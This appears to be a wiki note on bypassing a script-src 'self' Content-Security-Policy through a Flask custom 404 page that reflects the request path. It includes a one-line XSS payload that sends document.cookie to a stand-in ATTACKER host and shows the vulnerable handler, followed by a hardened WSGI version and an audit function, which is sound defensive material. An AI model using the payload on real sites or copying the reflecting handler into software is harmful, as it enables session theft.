csp-bypass-custom-404
Bypass CSP when a custom 404 page is present
With:
resp.headers['Content-Security-Policy'] = "script-src 'self';"
And a custom 404 page like:
@app.errorhandler(404)
def page_not_found(error):
    path = request.path
    return f"{path} not found"
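It's possible to reflect JS from the same origin: the 404 response echoes the request path, so a URL on the site itself returns text chosen by whoever wrote the URL, and script-src 'self' allows that URL as a script source.
For example: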
<script src='ab.c/;fetch(`ATTACKER/${btoa(document.cookie)}`) //'>
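An added example, not part of the original page: a standard-library WSGI model of the handler above next to a hardened version, with an audit function that reports which response properties let a 404 page load under script-src 'self'. The handler names, the probe path and the use of plain WSGI instead of Flask are assumptions made for the example; the 200 status in reflecting_404 mirrors what Flask sends when an error handler returns only a string.

```python
# Added example: stdlib-only WSGI model, not the page's Flask code.
from wsgiref.util import setup_testing_defaults

JS_TYPES = {"text/javascript", "application/javascript"}

def reflecting_404(environ, start_response):
    """Same behaviour as the page's handler: 200 status, HTML type, path echoed."""
    body = f"{environ['PATH_INFO']} not found".encode()
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [body]

def hardened_404(environ, start_response):
    """Real 404 status, non-script MIME type, nosniff, and no reflected input."""
    start_response("404 Not Found", [
        ("Content-Type", "text/plain; charset=utf-8"),
        ("X-Content-Type-Options", "nosniff"),
    ])
    return [b"not found"]

def call(app, path):
    """Invoke a WSGI app for one path; return (status_code, headers, body)."""
    environ, seen = {}, {}
    setup_testing_defaults(environ)
    environ["PATH_INFO"] = path
    def start_response(status, headers):
        seen["status"], seen["headers"] = int(status.split()[0]), dict(headers)
    body = b"".join(app(environ, start_response))
    return seen["status"], seen["headers"], body

def audit(app, marker="/zz-csp-probe-7f3a"):  # constructed probe path
    """List the properties that let an error page serve as a 'self' script."""
    status, headers, body = call(app, marker)
    mime = headers.get("Content-Type", "").split(";")[0].strip().lower()
    nosniff = headers.get("X-Content-Type-Options", "").lower() == "nosniff"
    findings = []
    if 200 <= status <= 299:
        findings.append("ok-status")          # script fetches require a 2xx response
    if not (nosniff and mime not in JS_TYPES):
        findings.append("mime-not-enforced")  # nosniff rejects non-JS types as script
    if marker.encode() in body:
        findings.append("path-reflected")     # request path echoed into the body
    return findings
```

Any one of the three hardening measures breaks the script load; applying all of them keeps the 404 page safe if one is later dropped.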
csp-bypass-custom-404.1724526768.txt.gz · Last modified: 2024/08/24 19:12 by osorin